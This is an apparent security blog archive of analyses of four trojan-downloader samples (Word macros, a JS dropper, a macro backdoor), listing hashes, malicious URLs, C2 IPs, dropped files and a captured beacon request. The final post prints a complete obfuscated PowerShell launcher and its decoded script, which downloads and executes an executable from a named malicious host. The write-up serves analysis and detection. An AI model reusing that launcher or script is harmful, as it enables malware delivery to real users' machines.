Tag Archives: TrojanDownloader

Trojan downloader word macro


SHA256 – 4221a9922d97fa329b3dbb27e37522448958cbfa186a6ef722e48d63f9753808

Download link – VirusTotal

I downloaded this Word document and checked whether a macro is present and whether it auto-executes on opening the document.

Yes, it does and it has obfuscated strings too.

blg5-05132019.PNG

I opened the document and navigated to Views > Macros > View Macros, selected “autoopen” and clicked Edit.

blg5-05132019-3.PNG

I renamed autoopen() to autoopen2 (which you can see in the above screenshot).

blg5-05132019-4.PNG

While debugging the macro, I found it executed a PowerShell script in obfuscated form.

blg5-05132019-5

blg5-05132019-6.PNG

After deobfuscation, below is the PowerShell script.

blg5-05132019-7.PNG

On debugging the PowerShell script, it tries to download 685.exe from one of the below URLs:

blg5-05132019-9.png

blg5-05132019-8.PNG

http://duanlocphatresidence[.]com/wp-admin/b8oyf2_w724r5u-66253
http://superwhite[.]com[.]au/wp-content/2t9x_bmoau88p-89600496
http://pneumorek[.]ma/calendar/EckAzvvl
http://pure-vapedistribution[.]be/p52r/js74mi_zk0p5orhwa-651
http://nitincarcare[.]com/wp-content/BbayinbUK

and drops the PE file at location C:\Users\<user>\685.exe

blg5-05132019-10.png

While debugging the PowerShell script, I tried to hit the download script but found that none of the above URLs has the PE file.

The file is removed from all URLs.

Below is VirusTotal score.

blg5-05132019-11.PNG

 

Trojan- JS downloader


I downloaded a JS trojan downloader from VirusSign to analyze the behavior of this malware. It was a zip file, INC_0987155124US_Apr_19_2019.zip, and after extracting it, I got a .js file.

On opening the JS file in Notepad, I saw a base64-obfuscated string. After deobfuscating the JS script, I found that this file has multiple sources/URLs to download SHA256 - d6798b62cef08c4f61a30dfa346faf5aa29f9d03e4599ebe5ae910a193087b86

Below are the URLs used in the JS to download malicious executable files.

Blg3_20042019_4

Below is the JS code, where it goes to a URL to check whether it’s up, else it will check another URL to get the malware downloaded on the user’s machine.

Blg3_20042019_7

I tried to access all four URLs used in the JS script and was able to download malicious .exe files from three of them. One URL was inaccessible.

Blg3_20042019_2.PNG

Below are the executable files downloaded from the URLs.

Blg3_20042019_3

When I checked the version and hash of all three files, all were the same.

Blg3_20042019_6

Behavior of executable file:

On execution, a file gets created in the C:\Windows\SysWow64 directory under the name sourcematrix.exe.

Blg3_20042019_8

and it also adds itself to the Windows services (services.msc).

Blg3_20042019_9.PNG

The Wireshark log shows this malware executable connects to IP address 5[.]230[.]147[.]179

Blg3_20042019_12.PNG

Below is the malicious executable file hash:

SHA256: D6798B62CEF08C4F61A30DFA346FAF5AA29F9D03E4599EBE5AE910A193087B86

Thank you.

Word Macro backdoor Trojan


I came across this sample in a Twitter post and immediately downloaded it from virusbay.io for analysis.

First I used oletools to analyse the Word macro.

  • The macro will execute on opening the file.
  • It creates a text file.
  • It executes a PowerShell command.
  • It uses base64 to obfuscate the string.
  • And it creates two bat files which will execute a PowerShell script.

blg2-04150-1

blg2-04150-2.PNG

Below are screenshots of the Word document.

blg2-04150-3

blg2-04150-5.PNG

When I clicked on Enable Editing and Edit Macro, a pop-up came up asking for a password, which I didn’t know. I clicked on the Cancel button, but the macro executed.

blg2-04150-13

blg2-04150-14.PNG

While performing this action, I was running Sysinternals Autoruns and Process Monitor to capture the background activity.

I found that the Word document dropped files at location C:\ProgramData; the file names are:

  • Win32ApiSync.bat 
  • Win32ApiSyncLog.txt

blg2-04150-11

and dropped another file in the Startup programs location:

  • Win32ApiSyncTskSchdlr.bat

blg2-04150-10

The Win32ApiSyncTskSchdlr.bat file will execute the Win32ApiSync.bat file and add it to Task Scheduler to run on a 1-hourly basis.

blg2-04150-8

and the Win32ApiSync.bat file will decode the base64-obfuscated string stored in the file Win32ApiSyncLog.txt.

blg2-04150-9

You can read the Win32ApiSyncLog.txt file data here: Pastebin

I used the below PowerShell script to decode the base64-obfuscated string and wrote it to a text file, which was actually a PowerShell script.

blg2-04150-15.PNG

You can read the decoded base64 string here at Pastebin, and below is the screenshot of the decoded string, which is a PowerShell script.

blg2-04150-16.PNG

The above decoded PowerShell has another base64-obfuscated string (start of string highlighted in yellow), which I decoded again using the same PowerShell script (above screenshot); you can find the output text here on Pastebin.

It has Chinese-like characters which I was unable to decode/translate, and because of this I thought to run this PowerShell to see the behavior.

I executed the Win32ApiSyncTskSchdlr.bat file and saw that it created a Task Scheduler job and scheduled the Win32ApiSync.bat file to trigger every 1 hour.

I found this information in the Sysinternals Autoruns tool.

blg2-04150-18

Below is the task scheduler job.

blg2-04150-19

I could also find files getting dropped at the below locations; the file names are:

  • 6772.xml
  • AutoSaved_17e74b3e-413b-498a-a922-8f04498c1d4a_Untitled2.ps1
  • AutoSaved_d40bd1dc-5457-4e11-85d5-b31138ee3b48_Untitled3.ps1
  • Userconfig.xml

blg2-04150-17

6772.xml file data

blg2-04150-24

A connection was made to remote IP 94[.]23[.]148[.]194 and a POST request was made.

blg2-04150-23

Below is the POST command:

POST /serverScript/clientFrontLine/helloServer.php?helloMsg=NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAt
NEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2
NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0V

Another HTTP request I see in Wireshark is 414 Request-URI Too Long, and the host is HANGER[]mobinhost[.]com, port 80.

blg2-04150-22

One more file was created at location C:\ProgramData\error.txt

The file has logs saying “unable to connect to remote server.” (this may be from when I disconnected from the Internet), and another error logged is “Invalid URI: The Uri string is too long.”

blg2-04150-25
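The helloMsg value in the POST command above can be unpacked offline. The following is an added example, not code from the original post or from the sample: it URL-decodes one item of the captured value, removes the CR/LF wraps, base64-decodes it, splits it on `*`, and counts how often each record repeats. The function names and the three-plus-one-truncated sample query are assumptions made for the illustration; the meaning of the individual fields is not stated on the page, so the code only separates them.

```python
import base64
from urllib.parse import unquote

# One comma-separated item of the helloMsg value, copied from the capture above
# exactly as it appears in the URI (still URL-encoded).
RECORD = (
    "NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0A"
    "c2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0A"
    "LWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ=="
)
# Constructed input: the item repeated three times plus a cut-off fourth,
# mirroring the repetition and truncation visible in the capture.
SAMPLE_QUERY = "helloMsg=" + ",".join([RECORD] * 3) + "," + RECORD[:40]


def decode_item(item):
    """URL-decode, remove CR/LF wraps, base64-decode, split on '*'."""
    b64 = "".join(unquote(item).split())
    b64 = b64[: len(b64) - len(b64) % 4]   # tolerate a cut-off final item
    text = base64.b64decode(b64).decode("utf-8", errors="replace")
    return text.split("*")


def summarize_hello_msg(query):
    """Decode every item and report how often each distinct record repeats."""
    value = query.split("helloMsg=", 1)[1]
    counts = {}
    for item in filter(None, value.split(",")):
        fields = tuple(decode_item(item))
        counts[fields] = counts.get(fields, 0) + 1
    return {"uri_chars": len(query), "records": counts}


if __name__ == "__main__":
    summary = summarize_hello_msg(SAMPLE_QUERY)
    print("URI length:", summary["uri_chars"])
    for fields, seen in summary["records"].items():
        print(seen, "x", fields)
```

On the item from the capture, the decoded fields include the Windows edition, host name, workgroup and user name of the analysis VM, and every complete item decodes to the same record.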

I renamed all the dropped bat files, PowerShell scripts and the text file, and tried to access the IP address via a browser.

blg2-04150-27

blg2-04150-28.PNG

Behavior of Malware: 

  • On opening the Word document, it drops batch files, which execute a PowerShell script from a base64-obfuscated string.
  • The batch files create a Task Scheduler job which executes every hour.
  • From the error logs and Wireshark network logs, it seems it uploads data to IP 94[.]23[.]148[.]194

 

Files dropped on system:

  • C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Win32ApiSyncTskSchdlr.bat
  • C:\ProgramData\Win32ApiSync.bat
  • C:\ProgramData\Win32ApiSyncLog.txt
  • C:\Users\IEUser\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\user.config
  • C:\Users\IEUser\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveFiles\AutoSaved_17e74b3e-413b-498a-a922-8f04498c1d4a_Untitled2.ps1
  • C:\Users\IEUser\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveFiles\AutoSaved_d40bd1dc-5457-4e11-85d5-b31138ee3b48_Untitled3.ps1
  • C:\Users\IEUser\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6772.xml

 

Suggestions are welcome. Thank you.

Microsoft word document malware analysis


I had emailed a recruiter last year about a job opportunity. He reverted a year later with an attachment; it was encrypted, and he provided the password.

Email

I unzipped it and looked at the properties of the Word document.

Email3

I analysed the file using oletools, and the result showed it as a suspicious file.

Email4

I found the value (“1jwe7d7n1544”) in the macro code (which is highlighted in yellow).

Email5

After debugging the macro from the Word document, I got a base64 string (below the screenshot).

Email6.PNG

cmD.exe /c P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAiACkAewANAAoAIAAgACAAIAAgAHQAcgB5AHsADQAKACAAIAAgACAAIAAkAHUAcgBpACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFUAcgBpACgAIgBoAHQAdABwADoALwAvAHYAZQB1AGwAYQBsAG0AZgBmAHkAeQAuAGMAbwBtAHAAYQBuAHkALwBwAHUAZQB3AHAAeABtAGEAcwBsAC8AcwB1AG8AZQBwAHcAeABwAGEAbQB4AGEAcAB4AGwAYQBtAHMAbAB4AGQAbwAuAHAAaABwAD8AbAA9AHMAawBsAGkAbQBmADUALgBoAGEAcgB6ACIAKQANAAoAIAAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlACAAPQAgACQAbQAuAEkAbgB2AG8AawBlACgAJABpAG4AcwB0AGEAbgBjAGUALAAgACgAJAB1AHIAaQApACkAOwANAAoADQAKACAAIAAgACAAIAAkAHAAYQB0AGgAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAIgBDAG8AbQBtAG8AbgBBAHAAcABsAGkAYwBhAHQAaQBvAG4ARABhAHQAYQAiACkAIAArACAAIgBcAFwAQgByAE0AdABqAC4AZQB4AGUAIgA7AA0ACgAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAcABhAHQAaAAsACAAJAByAGUAcwBwAG8AbgBzAGUAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAYwBsAHMAaQBkACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABHAHUAaQBkACAAJwBDADAAOABBAEYARAA5ADAALQBGADIAQQAxAC0AMQAxAEQAMQAtADgANAA1ADUALQAwADAAQQAwAEMAOQAxAEYAMwA4ADgAMAAnAA0ACgAgACAAIAAgACAAJAB0AHkAcABlACAAPQAgAFsAVAB5AHAAZQBdADoAOgBHAGUAdABUAHkAcABlAEYAcgBvAG0AQwBMAFMASQBEACgAJABjAGwAcwBpAGQAKQANAAoAIAAgACAAIAAgACQAbwBiAGoAZQBjAHQAIAA9ACAAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAHQAeQBwAGUAKQANAAoAIAAgACAAIAAgACQAbwBiAGoAZQBjAHQALgBEAG8AYwB1AG0AZQBuAHQALgBBAHAAcAB
sAGkAYwBhAHQAaQBvAG4ALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACQAcABhAHQAaAAsACQAbgB1AGwALAAgACQAbgB1AGwALAAgACQAbgB1AGwALAAwACkADQAKAA0ACgAgACAAIAAgACAAfQBjAGEAdABjAGgAewB9AA0ACgAgACAAIAAgACAADQAKACAAIAB9AA0ACgB9AA0ACgANAAoARQB4AGkAdAA7AA0ACgANAAoA 

Converting the base64 string resulted in the below PowerShell code.

$instance = [System.Activator]::CreateInstance("System.Net.WebClient");
$method = [System.Net.WebClient].GetMethods();
foreach($m in $method){
    if($m.Name -eq "DownloadData"){
        try{
            $uri = New-Object System.Uri("http:// veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf5.harz")
            $response = $m.Invoke($instance, ($uri));
            $path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\BrMtj.exe";
            [System.IO.File]::WriteAllBytes($path, $response);
            $clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'
            $type = [Type]::GetTypeFromCLSID($clsid)
            $object = [Activator]::CreateInstance($type)
            $object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0)
        }catch{}
    }
}
Exit;

Behavior of Macro — 

  • Executes when word document opens.

Behavior of PowerShell script —

  • The PowerShell script accesses the URL (http:// veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf5.harz)
  • It downloads the executable file BrMtj.exe

Note: When I tried to access the URL in a browser, it was inaccessible.
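The conversion step described above (caret-obfuscated cmd line, then base64 over UTF-16LE) can be scripted for triage. This is an added example, not the author's script or part of the sample: `PAGE_PREFIX` is the opening 32 characters of the blob shown on the page, while `SAMPLE_SCRIPT`, `SAMPLE_CMD`, the `files.example.invalid` URL and all function names are constructed for the illustration.

```python
import base64
import re

# Opening 32 characters of the -encodedcommand blob shown on the page.
PAGE_PREFIX = "JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAA"
B64_TOKEN = re.compile(r"[A-Za-z0-9+/=]+")


def find_encoded_blob(cmdline):
    """Return the base64 argument of -EncodedCommand, or None if absent."""
    # cmd.exe treats ^ as an escape character; dropping every caret
    # restores the readable tokens (sufficient for triage).
    tokens = cmdline.replace("^", "").split()
    for i, tok in enumerate(tokens):
        flag = tok.lower()
        # PowerShell accepts -ec and any prefix of -EncodedCommand (-e, -enc, ...).
        if flag == "-ec" or (len(flag) >= 2 and "-encodedcommand".startswith(flag)):
            parts = []
            for nxt in tokens[i + 1:]:       # the blob may be wrapped over lines
                if not B64_TOKEN.fullmatch(nxt):
                    break
                parts.append(nxt)
            return "".join(parts) or None
    return None


def decode_encoded_command(cmdline):
    """Decode the script text: base64 over UTF-16LE, tolerant of truncation."""
    blob = find_encoded_blob(cmdline)
    if blob is None:
        return None
    blob = blob[: len(blob) - len(blob) % 4]  # drop a cut-off trailing group
    return base64.b64decode(blob).decode("utf-16-le", errors="replace")


def defanged_urls(script):
    """List URLs found in decoded script text, defanged for safe sharing."""
    urls = re.findall(r"https?://[^\s\"'()]+", script)
    return [u.replace("http", "hxxp", 1).replace(".", "[.]") for u in urls]


# Constructed sample: same launcher shape as the page's command, harmless payload.
SAMPLE_SCRIPT = '$uri = New-Object System.Uri("http://files.example.invalid/get.php?id=1")\r\n'
SAMPLE_CMD = ("cmD.exe /c P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy "
              "B^^^yp^ass -encodedcommand "
              + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii"))

if __name__ == "__main__":
    print(repr(decode_encoded_command("powershell -enc " + PAGE_PREFIX)))
    print(defanged_urls(decode_encoded_command(SAMPLE_CMD)))
```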

Malware Sample on Virus Total — 

SHA256 — e4a959684cd6ea7248dc4d2ad0d5df2790ff217685c2a341d242a85b5808d720